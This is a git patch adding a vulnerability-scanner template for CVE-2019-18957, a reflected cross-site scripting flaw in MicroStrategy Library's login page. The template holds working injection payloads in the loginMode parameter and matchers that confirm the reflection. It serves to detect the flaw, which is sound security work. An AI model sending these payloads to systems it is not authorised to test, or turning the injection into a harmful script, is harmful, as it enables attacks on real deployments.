From 4a536eb9e1c71afedd0d5a0d7544f9e582f14943 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Mon, 10 Oct 2022 00:34:13 -0400 Subject: [PATCH] Create CVE-2019-18957.yaml --- cves/2019/CVE-2019-18957.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2019/CVE-2019-18957.yaml diff --git a/cves/2019/CVE-2019-18957.yaml b/cves/2019/CVE-2019-18957.yaml new file mode 100644 index 0000000000..b9e55a3cd6 --- /dev/null +++ b/cves/2019/CVE-2019-18957.yaml @@ -0,0 +1,41 @@ +id: CVE-2019-18957 +info: + name: Microstrategy Library before 11.1.3 XSS + author: tess + severity: medium + description: | + Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-18957 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957 + - https://www.cvedetails.com/cve/CVE-2019-18957/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-18957 + cwe-id: CWE-79 + tags: cve,cve2019,microstrategy,xss +requests: + - method: GET + path: + - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)" + - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=1%7d;alert(document.domain);window.loadingPageConfig%20=%20%7bpreviousLoginMode:1" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "previousLoginMode: alert(document.domain)" + - "alert(document.domain);window.loading" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200